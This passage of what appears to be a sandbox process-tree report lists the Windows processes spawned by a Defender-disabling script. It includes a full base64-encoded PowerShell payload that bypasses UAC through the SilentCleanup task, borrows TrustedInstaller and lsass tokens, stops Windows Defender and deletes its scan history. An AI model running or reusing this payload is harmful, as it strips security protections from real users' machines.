SwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1016 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecurityHealthSystray.exe (PID: 7824 cmdline: SecurityHealthSystray MD5: 783C99AFD4C2AE6950FA5694389D2CFA)

whoami.exe (PID: 3580 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

net1.exe (PID: 7928 cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net1.exe (PID: 3372 cmdline: "C:\Windows\system32\net1.exe" start lsass MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

powershell.exe (PID: 4088 cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7816 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 7856 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecurityHealthSystray.exe (PID: 7260 cmdline: SecurityHealthSystray MD5: 783C99AFD4C2AE6950FA5694389D2CFA)

net1.exe (PID: 5996 cmdline: "C:\Windows\system32\net1.exe" stop windefend MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

powershell.exe (PID: 8080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABTAFoAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAUwBpAHoAZQBPAGYAIgAsAFsAdAB5AHAAZQBbAF0AXQAnAHQAeQBwAGUAJwApADsAIAAkAFQAMQAuAGYAMQA9ADEAMwAxADAANwAyADsAIAAkAFQAMQAuAGYAMgA9ACQAWgA7ACAAJABUADEALgBmADMAPQAkAHYAOwAgACQAVAAyAC4AZgAxAD0AMQANAAoAIAAgACQAVAAyAC4AZgAyAD0AMQA7ACQAVAAyAC4AZgAzAD0AMQA7ACQAVAAyAC4AZgA0AD0AMQA7ACQAVAAyAC4AZgA2AD0AJABUADEAOwAkAFQAMwAuAGYAMQA9ACQAUwBaAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFQAWwA0AF0AKQA7ACQAVAA0AC4AZgAxAD0AJABUADMAOwAkAFQANAAuAGYAMgA9ACQASABHAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAFMAWgAuAGkAbgB2AG8AawBlACgAJABuAHUAbABsACwAJABUAFsAMgBdACkAKQANAAoAIAAgACQASAAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAIgBTAHQAcgB1AGMAdAB1AHIAZQBUAG8AYABQAHQAcgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABEAFsAMgBdACwAJABKACwAJwBiAG8AbwBsAGUAYQBuACcAKQApAC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALABAACgAKAAkAFQAMgAtAGEAcwAgACQARABbADIAXQApACwAJABUADQALgBmADIALAAkAGYAYQBsAHMAZQApACkAOwAkAHcAaQBuAGQAbwB3AD0AMAB4ADAARQAwADgAMAA2ADAAMAANAAoAIAAgACQAOQA9ACQAVABbADAAXQAuACIARwBlAHQAYABNAGUAdABoAG8AZAAiACgAJwBDAHIAZQBhAHQAZQBQAHIAbwBjAGUAcwBzACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAQAAoACQAbgB1AGwAbAAsACQAYwBtAGQALAAwACwAMAAsADAALAAkAHcAaQBuAGQAbwB3ACwAMAAsACQAbgB1AGwAbAAsACgAJABUADQALQBhAHMAIAAkAEQAWwA0AF0AKQAsACgAJABUADUALQBhAHMAIAAkAEQAWwA1AF0AKQApACkAOwAgAGIAcgBlAGEAawANAAoAfQANAAoADQAKACQAdwBkAHAAPQAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAnAA0ACgAnACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcALAAnAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACwAJwBcAE0AcABFAG4AZwBpAG4AZQAnACwAJwBcAFMAcAB5AG4AZQB0ACcALAAnAFwAUgBlAGEAbAAtAFQAaQBtAGUAIABQAHIAbwB0AGUAYwB0AGkAbwBuACcAIAB8ACUAIAB7AG4AaQAgACgAJAB3AGQAcAArACQAXwApAC0AZQBhACAAMAB8AG8AdQB0AC0AbgB1AGwAbAB9AA0ACgANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAJwAgAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAVQBYACAAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAnACAATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AXwBTAHUAcABwAHIAZQBzAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACcAIABEAGkAcwBhAGIAbABlAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIAAxACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAFUAWAAgAEMAbwBuAGYAaQBnAHUAcgBhAHQAaQBvAG4AJwAgAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAF8AUwB1AHAAcAByAGUAcwBzACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBzAHAAIAAnAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtACcAIABFAG4AYQBiAGwAZQBTAG0AYQByAHQAUwBjAHIAZQBlAG4AIAAwACAALQBUAHkAcABlACAARAB3AG8AcgBkACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACcASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACcAIABEAGkAcwBhAGIAbABlAEEAbgB0AGkAUwBwAHkAdwBhAHIAZQAgADEAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwBwACAAJwBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAJwAgAEQAaQBzAGEAYgBsAGUAQQBuAHQAaQBTAHAAeQB3AGEAcgBlACAAMQAgAC0AVAB5AHAAZQAgAEQAdwBvAHIAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAA0ACgBuAGUAdAAxACAAcwB0AG8AcAAgAHcAaQBuAGQAZQBmAGUAbgBkAA0ACgBzAGMALgBlAHgAZQAgAGMAbwBuAGYAaQBnACAAdwBpAG4AZABlAGYAZQBuAGQAIABkAGUAcABlAG4AZAA9ACAAUgBwAGMAUwBzAC0AVABPAEcARwBMAEUADQAKAGsAaQBsAGwAIAAtAE4AYQBtAGUAIABNAHAAQwBtAGQAUgB1AG4AIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAcwB0AGEAcgB0ACAAKAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKwAnAFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAE0AcABDAG0AZABSAHUAbgAuAGUAeABlACcAKQAgAC0AQQByAGcAIAAnAC0ARABpAHMAYQBiAGwAZQBTAGUAcgB2AGkAYwBlACcAIAAtAHcAaQBuACAAMQANAAoAZABlAGwAIAAoACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKwAnAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByAFwAUwBjAGEAbgBzAFwAbQBwAGUAbgBnAGkAbgBlAGQAYgAuAGQAYgAnACkAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAAgACAAIAAgACAAIAAgACAAIAAgACAAIwAjACAAQwBvAG0AbQBlAG4AdABlAGQAIAA9ACAAawBlAGUAcAAgAHMAYwBhAG4AIABoAGkAcwB0AG8AcgB5AA0ACgBkAGUAbAAgACgAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQArACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABTAGMAYQBuAHMAXABIAGkAcwB0AG8AcgB5AFwAUwBlAHIAdgBpAGMAZQAnACkAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAANAAoAJwBAACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAAOwAgAGkAZQB4ACgAKABnAHAAIABSAGUAZwBpAHMAdAByAHkAOgA6AEgASwBFAFkAXwBVAHMAZQByAHMAXABTAC0AMQAtADUALQAyADEAKgBcAFYAbwBsAGEAdABpAGwAZQAqACAAVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACAALQBlAGEAIAAwACkAWwAwAF0ALgBUAG8AZwBnAGwAZQBEAGUAZgBlAG4AZABlAHIAKQANAAoAIwAtAF8ALQAjAA== MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7540 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5800 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecurityHealthSystray.exe (PID: 4276 cmdline: SecurityHealthSystray MD5: 783C99AFD4C2AE6950FA5694389D2CFA)

whoami.exe (PID: 7848 cmdline: "C:\Windows\system32\whoami.exe" /groups MD5: A4A6924F3EAF97981323703D38FD99C4)

net1.exe (PID: 7996 cmdline: "C:\Windows\system32\net1.exe" start TrustedInstaller MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

net1.exe (PID: 8104 cmdline: "C:\Windows\system32\net1.exe" start lsass MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

powershell.exe (PID: 4476 cmdline: powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)} MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7780 cmdline: "C:\Windows\system32\sc.exe" qc windefend MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 7872 cmdline: "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

